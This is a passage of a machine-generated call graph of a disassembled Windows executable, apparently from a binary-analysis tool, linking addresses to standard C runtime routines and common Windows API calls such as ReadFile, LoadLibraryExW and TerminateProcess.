40efb2 20568->20569 20570 40efc7 20568->20570 20571 40e072 __dosmaperr 14 API calls 20569->20571 20572 40efe4 20570->20572 20573 40efcf 20570->20573 20574 40efb7 20571->20574 20611 41886b 20572->20611 20575 40e072 __dosmaperr 14 API calls 20573->20575 20577 40df74 ___std_exception_copy 41 API calls 20574->20577 20578 40efd4 20575->20578 20579 40efc2 20577->20579 20580 40df74 ___std_exception_copy 41 API calls 20578->20580 20579->20555 20581 40efdf 20580->20581 20581->20555 20583 40f0c3 __FrameHandler3::FrameUnwindToState 20582->20583 20584 40f0c9 20583->20584 20586 40f0fd 20583->20586 20585 40def7 _Fputc 41 API calls 20584->20585 20587 40f0e4 20585->20587 20593 40bb65 EnterCriticalSection 20586->20593 20587->20566 20589 40f109 20594 40f22c 20589->20594 20591 40f120 20603 40f149 20591->20603 20593->20589 20595 40f252 20594->20595 20596 40f23f 20594->20596 20606 40f153 20595->20606 20596->20591 20598 40f275 20599 40ed28 ___scrt_uninitialize_crt 66 API calls 20598->20599 20602 40f303 20598->20602 20600 40f2a3 20599->20600 20601 418af3 __wsopen_s 43 API calls 20600->20601 20601->20602 20602->20591 20610 40bb79 LeaveCriticalSection 20603->20610 20605 40f151 20605->20587 20607 40f164 20606->20607 20609 40f1bc 20606->20609 20608 418ab3 __wsopen_s 43 API calls 20607->20608 20607->20609 20608->20609 20609->20598 20610->20605 20612 41887f _Fputc 20611->20612 20617 418280 20612->20617 20615 40bbd5 _Fputc 41 API calls 20616 418899 20615->20616 20616->20581 20618 41828c __FrameHandler3::FrameUnwindToState 20617->20618 20619 418293 20618->20619 20620 4182b6 20618->20620 20621 40def7 _Fputc 41 API calls 20619->20621 20628 40bb65 EnterCriticalSection 20620->20628 20624 4182ac 20621->20624 20623 4182c4 20629 41830f 20623->20629 20624->20615 20626 4182d3 20642 418305 20626->20642 20628->20623 20630 418346 20629->20630 20631 41831e 20629->20631 20633 414bd2 _Ungetc 41 API calls 20630->20633 20632 40def7 _Fputc 41 API calls 20631->20632 20634 418339 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20632->20634 20635 41834f 20633->20635 20634->20626 20645 418a95 20635->20645 20637 418410 20637->20634 20660 4184b0 20637->20660 20639 4183f9 20648 41866f 20639->20648 20667 40bb79 LeaveCriticalSection 20642->20667 20644 41830d 20644->20624 20646 4188ac 45 API calls 20645->20646 20647 41836d 20646->20647 20647->20634 20647->20637 20647->20639 20649 41867e __wsopen_s 20648->20649 20650 414bd2 _Ungetc 41 API calls 20649->20650 20652 41869a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20650->20652 20651 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20653 418818 20651->20653 20654 418a95 45 API calls 20652->20654 20659 4186a6 20652->20659 20653->20634 20655 4186fa 20654->20655 20656 41872c ReadFile 20655->20656 20655->20659 20657 418753 20656->20657 20656->20659 20658 418a95 45 API calls 20657->20658 20658->20659 20659->20651 20661 414bd2 _Ungetc 41 API calls 20660->20661 20662 4184c3 20661->20662 20663 418a95 45 API calls 20662->20663 20665 41850b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20662->20665 20664 41855e 20663->20664 20664->20665 20666 418a95 45 API calls 20664->20666 20665->20634 20666->20665 20667->20644 22073 40bb19 22074 40edf6 ___scrt_uninitialize_crt 70 API calls 22073->22074 22075 40bb21 22074->22075 22083 4148f5 22075->22083 22077 40bb26 22078 4149a0 14 API calls 22077->22078 22079 40bb35 DeleteCriticalSection 22078->22079 22079->22077 22080 40bb50 22079->22080 22081 4140f1 ___free_lconv_mon 14 API calls 22080->22081 22082 40bb5b 22081->22082 22084 414901 __FrameHandler3::FrameUnwindToState 22083->22084 22093 40e0c6 EnterCriticalSection 22084->22093 22086 41490c 22087 414978 22086->22087 22090 41494c DeleteCriticalSection 22086->22090 22092 40bd99 71 API calls 22086->22092 22094 414997 22087->22094 22091 4140f1 ___free_lconv_mon 14 API calls 22090->22091 22091->22086 22092->22086 22093->22086 22097 40e10e LeaveCriticalSection 22094->22097 22096 414984 22096->22077 22097->22096 22111 417f20 22112 417f2f 22111->22112 22116 417f44 22111->22116 22113 40e072 __dosmaperr 14 API calls 22112->22113 22114 417f34 22113->22114 22115 40df74 ___std_exception_copy 41 API calls 22114->22115 22125 417f3f 22115->22125 22117 417fa2 22116->22117 22118 418105 _Ungetc 14 API calls 22116->22118 22116->22125 22119 414bd2 _Ungetc 41 API calls 22117->22119 22118->22117 22120 417fd2 22119->22120 22131 42211e 22120->22131 22123 414bd2 _Ungetc 41 API calls 22124 418014 22123->22124 22124->22125 22126 414bd2 _Ungetc 41 API calls 22124->22126 22127 418022 22126->22127 22127->22125 22128 414bd2 _Ungetc 41 API calls 22127->22128 22129 418030 22128->22129 22130 414bd2 _Ungetc 41 API calls 22129->22130 22130->22125 22132 42212a __FrameHandler3::FrameUnwindToState 22131->22132 22133 422132 22132->22133 22134 42214a 22132->22134 22136 40e05f __dosmaperr 14 API calls 22133->22136 22135 422207 22134->22135 22140 422180 22134->22140 22138 40e05f __dosmaperr 14 API calls 22135->22138 22137 422137 22136->22137 22139 40e072 __dosmaperr 14 API calls 22137->22139 22141 42220c 22138->22141 22160 417fda 22139->22160 22142 422189 22140->22142 22143 42219e 22140->22143 22144 40e072 __dosmaperr 14 API calls 22141->22144 22145 40e05f __dosmaperr 14 API calls 22142->22145 22161 41c9b3 EnterCriticalSection 22143->22161 22147 422196 22144->22147 22148 42218e 22145->22148 22150 40df74 ___std_exception_copy 41 API calls 22147->22150 22151 40e072 __dosmaperr 14 API calls 22148->22151 22149 4221a4 22152 4221c0 22149->22152 22153 4221d5 22149->22153 22150->22160 22151->22147 22154 40e072 __dosmaperr 14 API calls 22152->22154 22155 422232 __wsopen_s 53 API calls 22153->22155 22156 4221c5 22154->22156 22157 4221d0 22155->22157 22158 40e05f __dosmaperr 14 API calls 22156->22158 22162 4221ff 22157->22162 22158->22157 22160->22123 22160->22125 22161->22149 22165 41ca68 LeaveCriticalSection 22162->22165 22164 422205 22164->22160 22165->22164 20790 40683d 20791 406849 __EH_prolog3_GS 20790->20791 20793 406898 20791->20793 20797 406860 20791->20797 20801 4068b2 20791->20801 20804 4059c4 20793->20804 20837 4076f4 20797->20837 20800 406961 20832 403f30 20800->20832 20801->20800 20803 40699c 20801->20803 20807 403f80 20801->20807 20812 40ee9b 20801->20812 20803->20800 20840 40f649 20803->20840 20853 40e588 20804->20853 20808 403fa7 20807->20808 20809 403f89 20807->20809 20810 404420 43 API calls 20808->20810 20809->20801 20811 403fbb 20810->20811 20811->20801 20813 40eea7 __FrameHandler3::FrameUnwindToState 20812->20813 20814 40eeb1 20813->20814 20815 40eec9 20813->20815 20817 40e072 __dosmaperr 14 API calls 20814->20817 20937 40bb65 EnterCriticalSection 20815->20937 20819 40eeb6 20817->20819 20818 40eed3 20820 40ef6f 20818->20820 20823 414bd2 _Ungetc 41 API calls 20818->20823 20821 40df74 ___std_exception_copy 41 API calls 20819->20821 20938 40ee54 20820->20938 20822 40eec1 20821->20822 20822->20801 20830 40eef0 20823->20830 20825 40ef75 20945 40ef9f 20825->20945 20827 40ef47 20828 40e072 __dosmaperr 14 API calls 20827->20828 20829 40ef4c 20828->20829 20831 40df74 ___std_exception_copy 41 API calls 20829->20831 20830->20820 20830->20827 20831->20822 20833 403f3b 20832->20833 20834 403f56 std::ios_base::_Ios_base_dtor 20832->20834 20833->20834 20835 40df84 std::ios_base::_Init 41 API calls 20833->20835 20834->20797 20836 403f7a 20835->20836 20838 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20837->20838 20839 4076fe 20838->20839 20839->20839 20841 40f655 __FrameHandler3::FrameUnwindToState 20840->20841 20842 40f671 20841->20842 20843 40f65c 20841->20843 20949 40bb65 EnterCriticalSection 20842->20949 20845 40e072 __dosmaperr 14 API calls 20843->20845 20847 40f661 20845->20847 20846 40f67b 20950 40f550 20846->20950 20849 40df74 ___std_exception_copy 41 API calls 20847->20849 20850 40f66c 20849->20850 20850->20803 20854 40e594 __FrameHandler3::FrameUnwindToState 20853->20854 20855 40e5b2 20854->20855 20856 40e59b 20854->20856 20866 40bb65 EnterCriticalSection 20855->20866 20857 40e072 __dosmaperr 14 API calls 20856->20857 20859 40e5a0 20857->20859 20861 40df74 ___std_exception_copy 41 API calls 20859->20861 20860 40e5be 20867 40e418 20860->20867 20865 4059cf 20861->20865 20863 40e5c9 20901 40e5f7 20863->20901 20865->20797 20866->20860 20868 40e435 20867->20868 20869 40e49b 20867->20869 20870 414bd2 _Ungetc 41 API calls 20868->20870 20872 40e492 20869->20872 20873 414bd2 _Ungetc 41 API calls 20869->20873 20871 40e43b 20870->20871 20875 414bd2 _Ungetc 41 API calls 20871->20875 20891 40e45e 20871->20891 20872->20863 20874 40e4b0 20873->20874 20877 414bd2 _Ungetc 41 API calls 20874->20877 20892 40e4d3 20874->20892 20879 40e447 20875->20879 20876 40e479 20876->20872 20904 40ee90 20876->20904 20880 40e4bc 20877->20880 20878 40ee90 41 API calls 20882 40e4f3 20878->20882 20883 414bd2 _Ungetc 41 API calls 20879->20883 20879->20891 20885 414bd2 _Ungetc 41 API calls 20880->20885 20880->20892 20882->20872 20886 40f704 __Getctype 41 API calls 20882->20886 20884 40e453 20883->20884 20887 414bd2 _Ungetc 41 API calls 20884->20887 20888 40e4c8 20885->20888 20890 40e50b 20886->20890 20887->20891 20889 414bd2 _Ungetc 41 API calls 20888->20889 20889->20892 20893 40e535 20890->20893 20895 40ee90 41 API calls 20890->20895 20891->20869 20891->20876 20892->20872 20892->20878 20911 416351 20893->20911 20897 40e51c 20895->20897 20897->20893 20898 40e522 20897->20898 20900 40f649 43 API calls 20898->20900 20899 40e072 __dosmaperr 14 API calls 20899->20872 20900->20872 20936 40bb79 LeaveCriticalSection 20901->20936 20903 40e5fd 20903->20865 20905 40ee54 20904->20905 20906 40ee75 20905->20906 20907 40e072 __dosmaperr 14 API calls 20905->20907 20906->20876 20908 40ee65 20907->20908 20909 40df74 ___std_exception_copy 41 API calls 20908->20909 20910 40ee70 20909->20910 20910->20876 20912 416364 _Fputc 20911->20912 20917 41621e 20912->20917 20915 40bbd5 _Fputc 41 API calls 20916 40e549 20915->20916 20916->20872 20916->20899 20918 416232 20917->20918 20927 416242 20917->20927 20919 416267 20918->20919 20922 40d730 _Fputc 41 API calls 20918->20922 20918->20927 20920 416278 20919->20920 20921 41629b 20919->20921 20929 421a85 20920->20929 20924 4162c3 20921->20924 20925 416317 20921->20925 20921->20927 20922->20919 20924->20927 20928 41b00f __wsopen_s MultiByteToWideChar 20924->20928 20926 41b00f __wsopen_s MultiByteToWideChar 20925->20926 20926->20927 20927->20915 20928->20927 20932 423fd4 20929->20932 20935 423fff _Fputc 20932->20935 20933 407420 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20934 421aa0 20933->20934 20934->20927 20935->20933 20936->20903 20937->20818 20939 40ee60 20938->20939 20942 40ee75 20938->20942 20940 40e072 __dosmaperr 14 API calls 20939->20940 20941 40ee65 20940->20941 20943 40df74 ___std_exception_copy 41 API calls 20941->20943 20942->20825 20944 40ee70 20943->20944 20944->20825 20948 40bb79 LeaveCriticalSection 20945->20948 20947 40efa5 20947->20822 20948->20947 20949->20846 20951 40f568 20950->20951 20954 40f5d8 20950->20954 20952 414bd2 _Ungetc 41 API calls 20951->20952 20953 40f56e 20952->20953 20953->20954 20957 40f5c0 20953->20957 20955 418105 _Ungetc 14 API calls 20954->20955 20956 40f5d0 20954->20956 20955->20956 20961 40f6b4 20956->20961 20958 40e072 __dosmaperr 14 API calls 20957->20958 20959 40f5c5 20958->20959 20960 40df74 ___std_exception_copy 41 API calls 20959->20960 20960->20956 20964 40bb79 LeaveCriticalSection 20961->20964 20963 40f6ba 20963->20850 20964->20963 21036 4060d1 21037 4060d8 21036->21037 21039 406124 21036->21039 21041 40bb65 EnterCriticalSection 21037->21041 21040 4060dd 21041->21040 22408 41efea 22409 41f003 22408->22409 22410 41f021 22408->22410 22409->22410 22411 414a96 2 API calls 22409->22411 22411->22409 21262 411aed 21265 4117b9 21262->21265 21266 4117c5 __FrameHandler3::FrameUnwindToState 21265->21266 21273 40e0c6 EnterCriticalSection 21266->21273 21268 4117fd 21274 41181b 21268->21274 21269 4117cf 21269->21268 21271 41dcc6 __Getctype 14 API calls 21269->21271 21271->21269 21273->21269 21277 40e10e LeaveCriticalSection 21274->21277 21276 411809 21277->21276 17336 413ef2 17341 413cc8 17336->17341 17339 413f31 17342 413ce7 17341->17342 17343 413cfa 17342->17343 17351 413d0f 17342->17351 17361 40e072 17343->17361 17347 413d0a 17347->17339 17358 41fe8c 17347->17358 17348 40e072 __dosmaperr 14 API calls 17349 413ee0 17348->17349 17350 40df74 ___std_exception_copy 41 API calls 17349->17350 17350->17347 17351->17351 17356 413e2f 17351->17356 17367 41f71e 17351->17367 17353 413e7f 17354 41f71e 41 API calls 17353->17354 17353->17356 17355 413e9d 17354->17355 17355->17356 17357 41f71e 41 API calls 17355->17357 17356->17347 17356->17348 17357->17356 17893 41f856 17358->17893 17381 41528c GetLastError 17361->17381 17363 40e077 17364 40df74 17363->17364 17602 40dec0 17364->17602 17368 41f775 17367->17368 17370 41f72d 17367->17370 17816 41f78b 17368->17816 17369 41f733 17373 40e072 __dosmaperr 14 API calls 17369->17373 17370->17369 17374 41f750 17370->17374 17372 41f743 17372->17353 17375 41f738 17373->17375 17377 40e072 __dosmaperr 14 API calls 17374->17377 17380 41f76e 17374->17380 17376 40df74 ___std_exception_copy 41 API calls 17375->17376 17376->17372 17378 41f75f 17377->17378 17379 40df74 ___std_exception_copy 41 API calls 17378->17379 17379->17372 17380->17353 17382 4152a2 17381->17382 17383 4152a8 17381->17383 17404 4145dd 17382->17404 17387 4152ac SetLastError 17383->17387 17409 41461c 17383->17409 17387->17363 17391 4152e1 17393 41461c __Getctype 6 API calls 17391->17393 17392 4152f2 17394 41461c __Getctype 6 API calls 17392->17394 17395 4152ef 17393->17395 17396 4152fe 17394->17396 17421 4140f1 17395->17421 17397 415302 17396->17397 17398 415319 17396->17398 17400 41461c __Getctype 6 API calls 17397->17400 17427 414f69 17398->17427 17400->17395 17403 4140f1 ___free_lconv_mon 12 API calls 17403->17387 17432 4143cc 17404->17432 17406 4145f9 17407 414614 TlsGetValue 17406->17407 17408 414602 17406->17408 17408->17383 17410 4143cc std::_Locinfo::_Locinfo_ctor 5 API calls 17409->17410 17411 414638 17410->17411 17412 414641 17411->17412 17413 414656 TlsSetValue 17411->17413 17412->17387 17414 414094 17412->17414 17415 4140a1 __Getctype 17414->17415 17416 4140e1 17415->17416 17417 4140cc RtlAllocateHeap 17415->17417 17446 412e98 17415->17446 17418 40e072 __dosmaperr 13 API calls 17416->17418 17417->17415 17419 4140df 17417->17419 17418->17419 17419->17391 17419->17392 17422 414126 17421->17422 17423 4140fc HeapFree 17421->17423 17422->17387 17423->17422 17424 414111 GetLastError 17423->17424 17425 41411e __dosmaperr 17424->17425 17426 40e072 __dosmaperr 12 API calls 17425->17426 17426->17422 17460 414dfd 17427->17460 17433 4143fa 17432->17433 17437 4143f6 std::_Locinfo::_Locinfo_ctor 17432->17437 17433->17437 17438 414301 17433->17438 17436 414414 GetProcAddress 17436->17437 17437->17406 17444 414312 ___vcrt_InitializeCriticalSectionEx 17438->17444 17439 4143a8 17439->17436 17439->17437 17440 414330 LoadLibraryExW 17441 41434b GetLastError 17440->17441 17442 4143af 17440->17442 17441->17444 17442->17439 17443 4143c1 FreeLibrary 17442->17443 17443->17439 17444->17439 17444->17440 17445 41437e LoadLibraryExW 17444->17445 17445->17442 17445->17444 17449 412ec5 17446->17449 17450 412ed1 __FrameHandler3::FrameUnwindToState 17449->17450 17455 40e0c6 EnterCriticalSection 17450->17455 17452 412edc 17456 412f18 17452->17456 17455->17452 17459 40e10e LeaveCriticalSection 17456->17459 17458 412ea3 17458->17415 17459->17458 17461 414e09 __FrameHandler3::FrameUnwindToState 17460->17461 17474 40e0c6 EnterCriticalSection 17461->17474 17463 414e13 17475 414e43 17463->17475 17466 414f0f 17467 414f1b __FrameHandler3::FrameUnwindToState 17466->17467 17479 40e0c6 EnterCriticalSection 17467->17479 17469 414f25 17480 4150f0 17469->17480 17471 414f3d 17484 414f5d 17471->17484 17474->17463 17478 40e10e LeaveCriticalSection 17475->17478 17477 414e31 17477->17466 17478->17477 17479->17469 17481 4150ff __Getctype 17480->17481 17483 415126 __Getctype 17480->17483 17481->17483 17487 41d9f9 17481->17487 17483->17471 17601 40e10e LeaveCriticalSection 17484->17601 17486 414f4b 17486->17403 17488 41da79 17487->17488 17492 41da0f 17487->17492 17489 41dac7 17488->17489 17491 4140f1 ___free_lconv_mon 14 API calls 17488->17491 17555 41db6a 17489->17555 17493 41da9b 17491->17493 17492->17488 17494 41da42 17492->17494 17499 4140f1 ___free_lconv_mon 14 API calls 17492->17499 17495 4140f1 ___free_lconv_mon 14 API calls 17493->17495 17496 41da64 17494->17496 17503 4140f1 ___free_lconv_mon 14 API calls 17494->17503 17497 41daae 17495->17497 17498 4140f1 ___free_lconv_mon 14 API calls 17496->17498 17502 4140f1 ___free_lconv_mon 14 API calls 17497->17502 17504 41da6e 17498->17504 17501 41da37 17499->17501 17500 41dad5 17505 41db35 17500->17505 17514 4140f1 14 API calls ___free_lconv_mon 17500->17514 17515 41ccaf 17501->17515 17507 41dabc 17502->17507 17508 41da59 17503->17508 17509 4140f1 ___free_lconv_mon 14 API calls 17504->17509 17510 4140f1 ___free_lconv_mon 14 API calls 17505->17510 17512 4140f1 ___free_lconv_mon 14 API calls 17507->17512 17543 41d163 17508->17543 17509->17488 17511 41db3b 17510->17511 17511->17483 17512->17489 17514->17500 17516 41ccc0 17515->17516 17542 41cda9 17515->17542 17517 41ccd1 17516->17517 17518 4140f1 ___free_lconv_mon 14 API calls 17516->17518 17519 41cce3 17517->17519 17520 4140f1 ___free_lconv_mon 14 API calls 17517->17520 17518->17517 17521 41ccf5 17519->17521 17522 4140f1 ___free_lconv_mon 14 API calls 17519->17522 17520->17519 17523 41cd07 17521->17523 17524 4140f1 ___free_lconv_mon 14 API calls 17521->17524 17522->17521 17525 41cd19 17523->17525 17526 4140f1 ___free_lconv_mon 14 API calls 17523->17526 17524->17523 17527 41cd2b 17525->17527 17528 4140f1 ___free_lconv_mon 14 API calls 17525->17528 17526->17525 17529 41cd3d 17527->17529 17530 4140f1 ___free_lconv_mon 14 API calls 17527->17530 17528->17527 17531 41cd4f 17529->17531 17532 4140f1 ___free_lconv_mon 14 API calls 17529->17532 17530->17529 17533 41cd61 17531->17533 17534 4140f1 ___free_lconv_mon 14 API calls 17531->17534 17532->17531 17535 4140f1 ___free_lconv_mon 14 API calls 17533->17535 17537 41cd73 17533->17537 17534->17533 17535->17537 17536 41cd85 17539 41cd97 17536->17539 17540 4140f1 ___free_lconv_mon 14 API calls 17536->17540 17537->17536 17538 4140f1 ___free_lconv_mon 14 API calls 17537->17538 17538->17536 17541 4140f1 ___free_lconv_mon 14 API calls 17539->17541 17539->17542 17540->17539 17541->17542 17542->17494 17544 41d170 17543->17544 17554 41d1c8 17543->17554 17545 41d180 17544->17545 17546 4140f1 ___free_lconv_mon 14 API calls 17544->17546 17547 4140f1 ___free_lconv_mon 14 API calls 17545->17547 17551 41d192 17545->17551 17546->17545 17547->17551 17548 4140f1 ___free_lconv_mon 14 API calls 17549 41d1a4 17548->17549 17550 41d1b6 17549->17550 17552 4140f1 ___free_lconv_mon 14 API calls 17549->17552 17553 4140f1 ___free_lconv_mon 14 API calls 17550->17553 17550->17554 17551->17548 17551->17549 17552->17550 17553->17554 17554->17496 17556 41db77 17555->17556 17557 41db96 17555->17557 17556->17557 17561 41d67e 17556->17561 17557->17500 17560 4140f1 ___free_lconv_mon 14 API calls 17560->17557 17562 41d75c 17561->17562 17563 41d68f 17561->17563 17562->17560 17597 41d3dd 17563->17597 17566 41d3dd __Getctype 14 API calls 17567 41d6a2 17566->17567 17568 41d3dd __Getctype 14 API calls 17567->17568 17569 41d6ad 17568->17569 17570 41d3dd __Getctype 14 API calls 17569->17570 17571 41d6b8 17570->17571 17572 41d3dd __Getctype 14 API calls 17571->17572 17573 41d6c6 17572->17573 17574 4140f1 ___free_lconv_mon 14 API calls 17573->17574 17575 41d6d1 17574->17575 17576 4140f1 ___free_lconv_mon 14 API calls 17575->17576 17577 41d6dc 17576->17577 17578 4140f1 ___free_lconv_mon 14 API calls 17577->17578 17579 41d6e7 17578->17579 17580 41d3dd __Getctype 14 API calls 17579->17580 17598 41d3ef 17597->17598 17599 41d3fe 17598->17599 17600 4140f1 ___free_lconv_mon 14 API calls 17598->17600 17599->17566 17600->17598 17601->17486 17603 40ded2 _Fputc 17602->17603 17608 40def7 17603->17608 17605 40deea 17619 40bbd5 17605->17619 17609 40df0e 17608->17609 17610 40df07 17608->17610 17615 40df1c 17609->17615 17629 40dd4f 17609->17629 17625 40bd36 GetLastError 17610->17625 17613 40df43 17613->17615 17632 40dfa1 IsProcessorFeaturePresent 17613->17632 17615->17605 17616 40df73 17617 40dec0 ___std_exception_copy 41 API calls 17616->17617 17618 40df80 17617->17618 17618->17605 17620 40bbe1 17619->17620 17621 40bbf8 17620->17621 17672 40bd7c 17620->17672 17623 40bd7c _Fputc 41 API calls 17621->17623 17624 40bc0b 17621->17624 17623->17624 17624->17347 17626 40bd4f 17625->17626 17636 41533d 17626->17636 17630 40dd73 17629->17630 17631 40dd5a GetLastError SetLastError 17629->17631 17630->17613 17631->17613 17633 40dfad 17632->17633 17658 40dd78 17633->17658 17637 415350 17636->17637 17640 415356 17636->17640 17638 4145dd __Getctype 6 API calls 17637->17638 17638->17640 17639 41461c __Getctype 6 API calls 17641 415370 17639->17641 17640->17639 17657 40bd67 SetLastError 17640->17657 17642 414094 __Getctype 14 API calls 17641->17642 17641->17657 17643 415380 17642->17643 17644 415388 17643->17644 17645 41539d 17643->17645 17647 41461c __Getctype 6 API calls 17644->17647 17646 41461c __Getctype 6 API calls 17645->17646 17649 4153a9 17646->17649 17648 415394 17647->17648 17652 4140f1 ___free_lconv_mon 14 API calls 17648->17652 17650 4153ad 17649->17650 17651 4153bc 17649->17651 17653 41461c __Getctype 6 API calls 17650->17653 17654 414f69 __Getctype 14 API calls 17651->17654 17652->17657 17653->17648 17655 4153c7 17654->17655 17656 4140f1 ___free_lconv_mon 14 API calls 17655->17656 17656->17657 17657->17609 17659 40dd94 __purecall codecvt 17658->17659 17660 40ddc0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17659->17660 17661 40de91 __purecall 17660->17661 17664 407420 17661->17664 17663 40deaf GetCurrentProcess TerminateProcess 17663->17616 17665 407428 17664->17665 17666 407429 IsProcessorFeaturePresent 17664->17666 17665->17663 17668 407db2 17666->17668 17671 407d75 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17668->17671 17670 407e95 17670->17663 17671->17670 17673 40bd86 17672->17673 17674 40bd8f 17672->17674 17675 40bd36 _Fputc 16 API calls 17673->17675 17674->17621 17676 40bd8b 17675->17676 17676->17674 17679 40e13c 17676->17679 17690 4174ae 17679->17690 17682 40e14c 17684 40e156 IsProcessorFeaturePresent 17682->17684 17689 40e175 17682->17689 17686 40e162 17684->17686 17687 40dd78 __purecall 8 API calls 17686->17687 17687->17689 17720 411577 17689->17720 17723 4173e0 17690->17723 17693 4174f3 17694 4174ff __FrameHandler3::FrameUnwindToState 17693->17694 17695 41528c __dosmaperr 14 API calls 17694->17695 17697 417526 __purecall 17694->17697 17700 41752c __purecall 17694->17700 17695->17697 17696 417573 17699 40e072 __dosmaperr 14 API calls 17696->17699 17697->17696 17698 41755d 17697->17698 17697->17700 17698->17682 17701 417578 17699->17701 17703 41759f 17700->17703 17734 40e0c6 EnterCriticalSection 17700->17734 17702 40df74 ___std_exception_copy 41 API calls 17701->17702 17702->17698 17706 4175e1 17703->17706 17707 4176d2 17703->17707 17717 417610 17703->17717 17706->17717 17735 41513b GetLastError 17706->17735 17708 4176dd 17707->17708 17766 40e10e LeaveCriticalSection 17707->17766 17711 411577 __purecall 23 API calls 17708->17711 17713 4176e5 17711->17713 17715 41513b __Getctype 41 API calls 17718 417665 17715->17718 17716 41513b __Getctype 41 API calls 17716->17717 17762 41767f 17717->17762 17718->17698 17719 41513b __Getctype 41 API calls 17718->17719 17719->17698 17768 41139b 17720->17768 17724 4173ec __FrameHandler3::FrameUnwindToState 17723->17724 17729 40e0c6 EnterCriticalSection 17724->17729 17726 4173fa 17730 417438 17726->17730 17729->17726 17733 40e10e LeaveCriticalSection 17730->17733 17732 40e141 17732->17682 17732->17693 17733->17732 17734->17703 17736 415151 17735->17736 17737 415157 17735->17737 17738 4145dd __Getctype 6 API calls 17736->17738 17739 41461c __Getctype 6 API calls 17737->17739 17741 41515b SetLastError 17737->17741 17738->17737 17740 415173 17739->17740 17740->17741 17743 414094 __Getctype 14 API calls 17740->17743 17744 4151f0 17741->17744 17745 4151eb 17741->17745 17746 415188 17743->17746 17749 40e13c __purecall 39 API calls 17744->17749 17745->17716 17747 4151a1 17746->17747 17748 415190 17746->17748 17751 41461c __Getctype 6 API calls 17747->17751 17750 41461c __Getctype 6 API calls 17748->17750 17752 4151f5 17749->17752 17753 41519e 17750->17753 17754 4151ad 17751->17754 17758 4140f1 ___free_lconv_mon 14 API calls 17753->17758 17755 4151b1 17754->17755 17756 4151c8 17754->17756 17757 41461c __Getctype 6 API calls 17755->17757 17759 414f69 __Getctype 14 API calls 17756->17759 17757->17753 17758->17741 17760 4151d3 17759->17760 17761 4140f1 ___free_lconv_mon 14 API calls 17760->17761 17761->17741 17763 417685 17762->17763 17765 417656 17762->17765 17767 40e10e LeaveCriticalSection 17763->17767 17765->17698 17765->17715 17765->17718 17766->17708 17767->17765 17769 4113c8 17768->17769 17770 4113da 17768->17770 17795 411463 GetModuleHandleW 17769->17795 17780 411263 17770->17780 17775 40e17f 17781 41126f __FrameHandler3::FrameUnwindToState 17780->17781 17803 40e0c6 EnterCriticalSection 17781->17803 17783 411279 17804 4112b0 17783->17804 17785 411286 17808 4112a4 17785->17808 17788 411432 17811 4114a6 17788->17811 17791 411450 17793 4114c8 __purecall 3 API calls 17791->17793 17792 411440 GetCurrentProcess TerminateProcess 17792->17791 17794 411458 ExitProcess 17793->17794 17796 4113cd 17795->17796 17796->17770 17797 4114c8 GetModuleHandleExW 17796->17797 17798 411507 GetProcAddress 17797->17798 17799 411528 17797->17799 17798->17799 17802 41151b 17798->17802 17800 4113d9 17799->17800 17801 41152e FreeLibrary 17799->17801 17800->17770 17801->17800 17802->17799 17803->17783 17805 4112bc __FrameHandler3::FrameUnwindToState 17804->17805 17806 4131c9 __purecall 14 API calls 17805->17806 17807 411323 __purecall 17805->17807 17806->17807 17807->17785 17809 40e10e std::_Lockit::~_Lockit LeaveCriticalSection 17808->17809 17810 411292 17809->17810 17810->17775 17810->17788 17812 41914c __purecall 6 API calls 17811->17812 17813 4114ab 17812->17813 17814 4114b0 GetPEB 17813->17814 17815 41143c 17813->17815 17814->17815 17815->17791 17815->17792 17817 41f7b5 17816->17817 17818 41f79b 17816->17818 17820 41f7d4 17817->17820 17821 41f7bd 17817->17821 17819 40e072 __dosmaperr 14 API calls 17818->17819 17822 41f7a0 17819->17822 17824 41f7e0 17820->17824 17825 41f7f7 17820->17825 17823 40e072 __dosmaperr 14 API calls 17821->17823 17826 40df74 ___std_exception_copy 41 API calls 17822->17826 17827 41f7c2 17823->17827 17828 40e072 __dosmaperr 14 API calls 17824->17828 17833 41f7ab 17825->17833 17834 40fc60 17825->17834 17826->17833 17831 40df74 ___std_exception_copy 41 API calls 17827->17831 17829 41f7e5 17828->17829 17832 40df74 ___std_exception_copy 41 API calls 17829->17832 17831->17833 17832->17833 17833->17372 17835 40fc77 17834->17835 17836 40fc7e 17834->17836 17835->17833 17836->17835 17837 41513b __Getctype 41 API calls 17836->17837 17838 40fc9f 17837->17838 17842 415474 17838->17842 17843 415487 17842->17843 17845 40fcb5 17842->17845 17843->17845 17850 41dc45 17843->17850 17846 4154d2 17845->17846 17847 4154e5 17846->17847 17848 4154fa 17846->17848 17847->17848 17872 41c183 17847->17872 17848->17835 17851 41dc51 __FrameHandler3::FrameUnwindToState 17850->17851 17852 41513b __Getctype 41 API calls 17851->17852 17853 41dc5a 17852->17853 17854 41dca0 17853->17854 17863 40e0c6 EnterCriticalSection 17853->17863 17854->17845 17856 41dc78 17864 41dcc6 17856->17864 17861 40e13c __purecall 41 API calls 17862 41dcc5 17861->17862 17863->17856 17865 41dcd4 __Getctype 17864->17865 17867 41dc89 17864->17867 17866 41d9f9 __Getctype 14 API calls 17865->17866 17865->17867 17866->17867 17868 41dca5 17867->17868 17871 40e10e LeaveCriticalSection 17868->17871 17870 41dc9c 17870->17854 17870->17861 17871->17870 17873 41513b __Getctype 41 API calls 17872->17873 17874 41c188 17873->17874 17877 41c09b 17874->17877 17878 41c0a7 __FrameHandler3::FrameUnwindToState 17877->17878 17880 41c0c1 17878->17880 17888 40e0c6 EnterCriticalSection 17878->17888 17882 41c0c8 17880->17882 17884 40e13c __purecall 41 API calls 17880->17884 17881 41c0fd 17889 41c11a 17881->17889 17882->17848 17886 41c13a 17884->17886 17885 41c0d1 17885->17881 17887 4140f1 ___free_lconv_mon 14 API calls 17885->17887 17887->17881 17888->17885 17892 40e10e 